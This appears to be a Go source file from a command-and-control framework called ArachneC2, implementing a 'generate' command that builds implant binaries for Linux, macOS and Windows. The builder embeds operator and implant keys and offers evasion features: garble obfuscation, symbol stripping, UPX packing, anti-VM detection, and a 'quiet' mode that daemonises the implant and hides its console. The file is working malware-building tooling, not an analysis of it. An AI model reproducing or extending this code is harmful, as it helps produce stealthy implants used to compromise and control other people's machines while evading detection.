package core

import (
	"archive/tar"
	"archive/zip"
	"bytes"
	"compress/gzip"
	"context"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"flag"
	"fmt"
	"io"
	"log"
	"net/http"
	"os"
	"os/exec"
	"path/filepath"
	"runtime"
	"strings"
	"time"

	"github.com/libp2p/go-libp2p/core/crypto"
	"github.com/libp2p/go-libp2p/core/peer"

	"github.com/portbuster1337/ArachneC2/server/core/embedsrc"
)

type GenerateConfig struct {
	PubKeyPath string
	OutputPath string
	TargetOS   string
	TargetArch string
	UseUPX     bool
	Obfuscate  bool
	Quiet      bool
	Antivm     bool
}

func RunGenerate(args []string) error {
	cfg := GenerateConfig{
		PubKeyPath: defaultPubKeyPath(),
		OutputPath: "implant",
		TargetOS:   "linux",
		TargetArch: "amd64",
	}

	fs := flag.NewFlagSet("generate", flag.ExitOnError)
	fs.StringVar(&cfg.PubKeyPath, "pubkey", cfg.PubKeyPath, "path to operator public key")
	fs.StringVar(&cfg.OutputPath, "output", cfg.OutputPath, "output path for the implant binary")
	fs.StringVar(&cfg.TargetOS, "os", cfg.TargetOS, "target OS (linux, darwin, windows)")
	fs.StringVar(&cfg.TargetArch, "arch", cfg.TargetArch, "target architecture (amd64, arm64)")
	fs.BoolVar(&cfg.UseUPX, "upx", true, "compress with UPX")
	fs.BoolVar(&cfg.Obfuscate, "obfuscate", false, "obfuscate the implant with garble (auto-installs if missing)")
	fs.BoolVar(&cfg.Quiet, "quiet", false, "suppress output and run in background (no console on Windows)")
	fs.BoolVar(&cfg.Antivm, "antivm", false, "enable VM detection (pure Go, no CGO required — 65+ techniques, VMAware-compatible scoring)")
	fs.Parse(args)

	return BuildImplant(cfg)
}

func BuildImplant(cfg GenerateConfig) error {
	pubData, err := os.ReadFile(cfg.PubKeyPath)
	if err != nil {
		return fmt.Errorf("read pubkey %s: %w", cfg.PubKeyPath, err)
	}

	implantPriv, implantPub, err := crypto.GenerateEd25519Key(rand.Reader)
	if err != nil {
		return fmt.Errorf("generate implant key: %w", err)
	}
	privBytes, err := crypto.MarshalPrivateKey(implantPriv)
	if err != nil {
		return fmt.Errorf("marshal implant private key: %w", err)
	}
	implantPeerID, _ := peer.IDFromPublicKey(implantPub)
	log.Printf("implant PeerID: %s", implantPeerID.String())

	buildDir, err := prepareBuildDir(pubData, privBytes, cfg.Quiet)
	if err != nil {
		return fmt.Errorf("prepare build directory: %w", err)
	}
	defer os.RemoveAll(buildDir)

	outPath := cfg.OutputPath
	if !filepath.IsAbs(outPath) {
		wd, _ := os.Getwd()
		outPath = filepath.Join(wd, outPath)
	}

	_, err = ensureGo()
	if err != nil {
		return fmt.Errorf("go not available: %w", err)
	}

	goBin := findGo()

	ldflags := "-s -w -buildid="
	if cfg.Quiet && cfg.TargetOS == "windows" {
		ldflags += " -H=windowsgui"
	}

	var builder string
	var buildArgs []string
	if cfg.Obfuscate {
		garble, err := ensureGarble(goBin)
		if err != nil {
			return fmt.Errorf("garble not available: %w", err)
		}
		builder = garble
		buildArgs = []string{"-literals", "-tiny", "build", "-trimpath", "-buildvcs=false", "-o", outPath, "-ldflags=" + ldflags}
		log.Printf("obfuscating with garble")
	} else {
		builder = goBin
		buildArgs = []string{"build", "-trimpath", "-buildvcs=false", "-o", outPath, "-ldflags=" + ldflags}
	}

	if cfg.Antivm {
		buildArgs = append(buildArgs, "-tags=antivm")
	}
	buildArgs = append(buildArgs, "./implant/")

	cmd := exec.Command(builder, buildArgs...)
	path := os.Getenv("PATH")
	goDir := filepath.Dir(goBin)
	if !strings.Contains(path, goDir) {
		path = goDir + ":" + path
	}
	env := []string{
		"GOOS=" + cfg.TargetOS,
		"GOARCH=" + cfg.TargetArch,
		"CGO_ENABLED=0",
		"PATH=" + path,
	}
	cmd.Env = append(os.Environ(), env...)
	cmd.Stdout = os.Stdout
	cmd.Stderr = os.Stderr
	cmd.Dir = buildDir

	log.Printf("building implant for %s/%s -> %s", cfg.TargetOS, cfg.TargetArch, outPath)
	if err := cmd.Run(); err != nil {
		return fmt.Errorf("build: %w", err)
	}
	log.Printf("built %s", outPath)

	// Best-effort strip for Linux/macOS to remove any remaining symbol tables
	if cfg.TargetOS == "linux" || cfg.TargetOS == "darwin" {
		stripCmd := exec.Command("strip", "-s", outPath)
		_ = stripCmd.Run()
	}

	if cfg.UseUPX {
		if upxPath, err := exec.LookPath("upx"); err == nil {
			upx := exec.Command(upxPath, "--lzma", "--compress-exports=0", outPath)
			upx.Stdout = os.Stdout
			upx.Stderr = os.Stderr
			if err := upx.Run(); err != nil {
				log.Printf("upx compression skipped: %v", err)
			}
		} else {
			log.Printf("upx not found, skipping compression")
		}
	}

	return nil
}

func prepareBuildDir(pubKeyData, privKeyData []byte, quiet bool) (string, error) {
	dir, err := os.MkdirTemp("", "arachne-build-*")
	if err != nil {
		return "", fmt.Errorf("create temp dir: %w", err)
	}

	pubLiteral := bytesLiteral(pubKeyData)
	privLiteral := bytesLiteral(privKeyData)
	pubContent := fmt.Sprintf(`// Code generated by arachne generate. DO NOT EDIT.
package core

var embeddedOperatorPubKey = %s
`, pubLiteral)
	keyContent := fmt.Sprintf(`// Code generated by arachne generate. DO NOT EDIT.
package core

var embeddedImplantPrivKey = %s
`, privLiteral)

	if err := extractEmbeddedSource(dir); err != nil {
		return "", err
	}

	// Rename go.mod.txt/go.sum.txt back to real names
	os.Rename(filepath.Join(dir, "go.mod.txt"), filepath.Join(dir, "go.mod"))
	os.Rename(filepath.Join(dir, "go.sum.txt"), filepath.Join(dir, "go.sum"))

	coreDir := filepath.Join(dir, "implant", "core")
	if err := os.WriteFile(filepath.Join(coreDir, "embedded_pubkey.go"), []byte(pubContent), 0644); err != nil {
		return "", fmt.Errorf("write embedded_pubkey.go: %w", err)
	}
	if err := os.WriteFile(filepath.Join(coreDir, "embedded_implant_key.go"), []byte(keyContent), 0644); err != nil {
		return "", fmt.Errorf("write embedded_implant_key.go: %w", err)
	}

	if quiet {
		if err := writeQuietStub(coreDir); err != nil {
			return "", fmt.Errorf("write quiet stub: %w", err)
		}
	}

	return dir, nil
}

func writeQuietStub(coreDir string) error {
	quietContent := `//go:build !windows

package core

import (
	"os"
	"syscall"
)

func init() {
	if os.Getenv("_ARACHNE_DAEMON") == "1" {
		return
	}

	f, err := os.OpenFile("/dev/null", os.O_RDWR, 0)
	if err != nil {
		os.Exit(1)
	}

	attr := &os.ProcAttr{
		Files: []*os.File{f, f, f},
		Env:   append(os.Environ(), "_ARACHNE_DAEMON=1"),
		Sys:   &syscall.SysProcAttr{Setsid: true},
	}

	proc, err := os.StartProcess(os.Args[0], os.Args, attr)
	if err != nil {
		os.Exit(1)
	}
	proc.Release()
	os.Exit(0)
}
`
	return os.WriteFile(filepath.Join(coreDir, "quiet.go"), []byte(quietContent), 0644)
}

func extractEmbeddedSource(dst string) error {
	gz, err := gzip.NewReader(bytes.NewReader(embedsrc.ImplantSourceArchive))
	if err != nil {
		return fmt.Errorf("gzip reader: %w", err)
	}
	defer gz.Close()

	tr := tar.NewReader(gz)
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			break
		}
		if err != nil {
			return fmt.Errorf("tar next: %w", err)
		}

		target := filepath.Join(dst, hdr.Name)
		switch hdr.Typeflag {
		case tar.TypeDir:
			if err := os.MkdirAll(target, 0755); err != nil {
				return err
			}
		case tar.TypeReg:
			if err := os.MkdirAll(filepath.Dir(target), 0755); err != nil {
				return err
			}
			f, err := os.OpenFile(target, os.O_CREATE|os.O_RDWR, os.FileMode(hdr.Mode))
			if err != nil {
				return err
			}
			if _, err := io.Copy(f, tr); err != nil {
				f.Close()
				return err
			}
			f.Close()
		}
	}
	return nil
}

func defaultPubKeyPath() string {
	home, err := os.UserHomeDir()
	if err != nil {
		return "operator.pub"
	}
	return filepath.Join(home, ".arachne", "operator.pub")
}

func findProjectRoot() (string, error) {
	dir, err := os.Getwd()
	if err != nil {
		return "", err
	}
	for {
		if fileExists(filepath.Join(dir, "go.mod")) {
			return dir, nil
		}
		parent := filepath.Dir(dir)
		if parent == dir {
			return "", fmt.Errorf("no go.mod found (run from project root)")
		}
		dir = parent
	}
}

func findGo() string {
	if p, err := exec.LookPath("go"); err == nil {
		return p
	}
	if goroot := os.Getenv("GOROOT"); goroot != "" {
		candidate := filepath.Join(goroot, "bin", "go")
		if fileExists(candidate) {
			return candidate
		}
	}

	goexe := "go"
	if runtime.GOOS == "windows" {
		goexe = "go.exe"
	}

	for _, p := range []string{
		"/usr/local/go/bin/go",
		filepath.Join(os.Getenv("HOME"), ".local", "go", "bin", goexe),
		"/tmp/go/bin/" + goexe,
		"/usr/lib/go/bin/go",
		`C:\Go\bin\go.exe`,
		filepath.Join(os.Getenv("ProgramFiles"), "Go", "bin", "go.exe"),
		filepath.Join(os.Getenv("LocalAppData"), "go", "bin", goexe),
	} {
		if fileExists(p) {
			return p
		}
	}
	return goexe
}

type goFile struct {
	Filename string `json:"filename"`
	OS       string `json:"os"`
	Arch     string `json:"arch"`
	SHA256   string `json:"sha256"`
}

type goVersion struct {
	Version string  `json:"version"`
	Stable  bool    `json:"stable"`
	Files   []goFile `json:"files"`
}

func ensureGo() (string, error) {
	if p, err := exec.LookPath("go"); err == nil {
		return p, nil
	}
	if goroot := os.Getenv("GOROOT"); goroot != "" {
		candidate := filepath.Join(goroot, "bin", "go")
		if fileExists(candidate) {
			return candidate, nil
		}
	}
	if fileExists("/usr/local/go/bin/go") {
		return "/usr/local/go/bin/go", nil
	}

	log.Print("Go not found. Attempting to install...")

	osName := runtime.GOOS
	archName := runtime.GOARCH
	switch archName {
	case "x86_64":
		archName = "amd64"
	case "aarch64":
		archName = "arm64"
	}

	ext := ".tar.gz"
	if osName == "windows" {
		ext = ".zip"
	}

	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
	defer cancel()

	req, err := http.NewRequestWithContext(ctx, "GET", "https://go.dev/VERSION?m=text", nil)
	if err != nil {
		return "", fmt.Errorf("create version request: %w", err)
	}
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return "", fmt.Errorf("check go version: %w", err)
	}
	defer resp.Body.Close()
	versionBytes, err := io.ReadAll(resp.Body)
	if err != nil {
		return "", fmt.Errorf("read go version: %w", err)
	}
	version := strings.TrimSpace(strings.Split(string(versionBytes), "\n")[0])

	filename := fmt.Sprintf("%s.%s-%s%s", version, osName, archName, ext)
	url := fmt.Sprintf("https://go.dev/dl/%s", filename)

	// Fetch checksums from go.dev JSON API
	checksums, err := fetchGoChecksums()
	if err != nil {
		return "", fmt.Errorf("fetch go checksums: %w", err)
	}
	expectedHash, ok := checksums[filename]
	if !ok {
		return "", fmt.Errorf("no checksum found for %s", filename)
	}

	log.Printf("downloading %s ...", url)

	tarball, err := os.CreateTemp("", "go-*"+ext)
	if err != nil {
		return "", fmt.Errorf("create temp file: %w", err)
	}
	defer os.Remove(tarball.Name())

	dlCtx, dlCancel := context.WithTimeout(context.Background(), 120*time.Second)
	defer dlCancel()
	dlReq, err := http.NewRequestWithContext(dlCtx, "GET", url, nil)
	if err != nil {
		return "", fmt.Errorf("create download request: %w", err)
	}
	dlResp, err := http.DefaultClient.Do(dlReq)
	if err != nil {
		return "", fmt.Errorf("download go: %w", err)
	}
	defer dlResp.Body.Close()

	hash := sha256.New()
	if _, err := io.Copy(io.MultiWriter(tarball, hash), dlResp.Body); err != nil {
		return "", fmt.Errorf("write go archive: %w", err)
	}
	tarball.Close()

	got := hex.EncodeToString(hash.Sum(nil))
	if got != expectedHash {
		return "", fmt.Errorf("checksum mismatch for %s:\n  expected: %s\n  got:      %s", filename, expectedHash, got)
	}
	log.Printf("SHA256 verified: %s", expectedHash)

	installDir := installGo(tarball.Name(), osName)

	log.Printf("Go %s installed at %s", version, installDir)
	return filepath.Join(installDir, "bin", "go"), nil
}

func fetchGoChecksums() (map[string]string, error) {
	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
	defer cancel()
	req, err := http.NewRequestWithContext(ctx, "GET", "https://go.dev/dl/?mode=json&include=all", nil)
	if err != nil {
		return nil, fmt.Errorf("create metadata request: %w", err)
	}
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return nil, fmt.Errorf("get go metadata: %w", err)
	}
	defer resp.Body.Close()

	var versions []goVersion
	if err := json.NewDecoder(resp.Body).Decode(&versions); err != nil {
		return nil, fmt.Errorf("decode go metadata: %w", err)
	}

	checksums := make(map[string]string)
	for _, v := range versions {
		for _, f := range v.Files {
			checksums[f.Filename] = f.SHA256
		}
	}
	return checksums, nil
}

func installGo(archive, osName string) string {
	homeDir, _ := os.UserHomeDir()

	candidates := []string{
		"/usr/local/go",
		filepath.Join(homeDir, ".local", "go"),
		"/tmp/go",
	}
	if osName == "windows" {
		progFiles := os.Getenv("ProgramFiles")
		if progFiles == "" {
			progFiles = `C:\Program Files`
		}
		candidates = []string{
			filepath.Join(progFiles, "Go"),
			filepath.Join(homeDir, "sdk", "go"),
			filepath.Join(os.TempDir(), "go"),
		}
	}

	for _, dst := range candidates {
		parent := filepath.Dir(dst)
		os.RemoveAll(dst)
		os.MkdirAll(parent, 0755)
		if extractGoArchive(archive, parent, osName) == nil {
			if _, err := os.Stat(dst); err == nil {
				log.Printf("Go extracted to %s", dst)
				return dst
			}
		}
	}

	// Last resort: always try the root of the temp dir
	tmpRoot := "/tmp"
	if osName == "windows" {
		tmpRoot = os.TempDir()
	}
	os.RemoveAll(filepath.Join(tmpRoot, "go"))
	extractGoArchive(archive, tmpRoot, osName)
	return filepath.Join(tmpRoot, "go")
}

func extractGoArchive(archive, dst, osName string) error {
	if osName == "windows" {
		return extractZip(archive, dst)
	}
	return exec.Command("tar", "-C", dst, "-xzf", archive).Run()
}

func extractZip(src, dst string) error {
	r, err := zip.OpenReader(src)
	if err != nil {
		return fmt.Errorf("open zip: %w", err)
	}
	defer r.Close()

	for _, f := range r.File {
		target := filepath.Join(dst, f.Name)

		// ZipSlip protection
		if !strings.HasPrefix(filepath.Clean(target), filepath.Clean(dst)+string(os.PathSeparator)) {
			continue
		}

		if f.FileInfo().IsDir() {
			os.MkdirAll(target, 0755)
			continue
		}

		os.MkdirAll(filepath.Dir(target), 0755)

		rc, err := f.Open()
		if err != nil {
			return fmt.Errorf("open %s in zip: %w", f.Name, err)
		}

		out, err := os.OpenFile(target, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, f.Mode())
		if err != nil {
			rc.Close()
			return fmt.Errorf("create %s: %w", target, err)
		}

		_, err = io.Copy(out, rc)
		rc.Close()
		out.Close()
		if err != nil {
			return fmt.Errorf("extract %s: %w", f.Name, err)
		}
	}
	return nil
}

func ensureGarble(goBin string) (string, error) {
	if p, err := exec.LookPath("garble"); err == nil {
		return p, nil
	}
	log.Print("garble not found. Installing via 'go install mvdan.cc/garble@latest'...")
	cmd := exec.Command(goBin, "install", "mvdan.cc/garble@latest")
	cmd.Env = append(os.Environ(), "PATH="+filepath.Dir(goBin)+":"+os.Getenv("PATH"))
	cmd.Stdout = os.Stdout
	cmd.Stderr = os.Stderr
	if err := cmd.Run(); err != nil {
		return "", fmt.Errorf("install garble: %w", err)
	}

	if p, err := exec.LookPath("garble"); err == nil {
		return p, nil
	}

	// go install puts binaries in GOPATH/bin — check each entry
	gopathOut, _ := exec.Command(goBin, "env", "GOPATH").Output()
	gopath := strings.TrimSpace(string(gopathOut))
	if gopath != "" {
		for _, p := range filepath.SplitList(gopath) {
			candidate := filepath.Join(p, "bin", "garble")
			if fileExists(candidate) {
				log.Print("garble installed")
				return candidate, nil
			}
		}
	}

	return "", fmt.Errorf("garble installed but not found in PATH or GOPATH/bin")
}

func fileExists(path string) bool {
	_, err := os.Stat(path)
	return err == nil
}

func bytesLiteral(data []byte) string {
	var parts []string
	for _, b := range data {
		parts = append(parts, fmt.Sprintf("%d", b))
	}
	return "[]byte{" + strings.Join(parts, ",") + "}"
}
